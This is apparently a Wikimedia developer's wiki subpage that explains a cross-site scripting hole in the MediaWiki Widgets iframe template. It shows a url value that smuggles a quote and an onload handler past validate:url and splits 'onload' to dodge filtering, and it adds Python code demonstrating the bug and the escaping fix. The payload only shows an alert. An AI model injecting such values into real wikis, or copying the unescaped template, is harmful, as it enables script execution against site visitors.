User:BWolff (WMF)/CSP/4

Example

For example:

The iframe widget is defined as:

<includeonly><iframe src="<!--{$url|validate:url}-->" style="border: <!--{$border|escape:html|default:0}-->" width="<!--{$width|escape:html|default:400}-->" height="<!--{$height|escape:html|default:300}-->"></iframe></includeonly>

If we have the wiki-code

{{#widget:iframe|width=0|height=0|url=https://example.com/"onl{{safesubst:ns:0}}oad="alert('All\40your\40base\40are\40belong\40to\40us')}}

then the rendered HTML is:

<p><iframe src="https://example.com/"onload="alert('All\40your\40base\40are\40belong\40to\40us')" style="border: 0" width="0" height="0"></iframe>
</p>

The double quote in the url parameter is not escaped by validate:url, so it closes the src attribute and the remainder of the value becomes an onload attribute, which causes "All your base are belong to us" to show up in a pop-up box.
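The same mistake reproduced in Python, as an added example (not code from this page or from the Widgets extension): validate_url is a hypothetical stand-in for the validate:url modifier, html.parser stands in for the browser's tolerant attribute parsing, and the payload is the page's own url value after {{safesubst:ns:0}} has expanded to nothing. Validation alone lets the quote close the src attribute; the attribute escaping the template already applies to width and height keeps the whole value inside src.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit


def validate_url(value: str) -> str:
    """Hypothetical stand-in for Smarty's validate:url modifier: keeps a value
    that parses as an http(s) URL but does NOT encode quotes or angle brackets."""
    parts = urlsplit(value)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return ""
    return value


def render_iframe(url: str, width: str = "400", height: str = "300",
                  border: str = "0", escape_url: bool = False) -> str:
    """Build the tag the way the widget template does. escape_url=False mirrors
    the template (validation only); escape_url=True also applies the attribute
    escaping the template already uses for its other attributes."""
    src = validate_url(url)
    if escape_url:
        src = html.escape(src, quote=True)  # " -> &quot;  ' -> &#x27;
    return (f'<iframe src="{src}" style="border: {html.escape(border)}" '
            f'width="{html.escape(width)}" height="{html.escape(height)}"></iframe>')


class _IframeAttrs(HTMLParser):
    """Tolerant tag-soup parser, used here as a stand-in for the browser."""
    def __init__(self):
        super().__init__()
        self.attrs = {}

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.attrs = dict(attrs)


def iframe_attributes(markup: str) -> dict:
    """Return the attributes a browser would see on the rendered <iframe>."""
    parser = _IframeAttrs()
    parser.feed(markup)
    return parser.attrs


# The page's own url value, after {{safesubst:ns:0}} has expanded to nothing.
PAYLOAD = r"""https://example.com/"onload="alert('All\40your\40base\40are\40belong\40to\40us')"""
```

With escape_url=False the parsed iframe carries an onload attribute; with escape_url=True it has only src, holding the full original string.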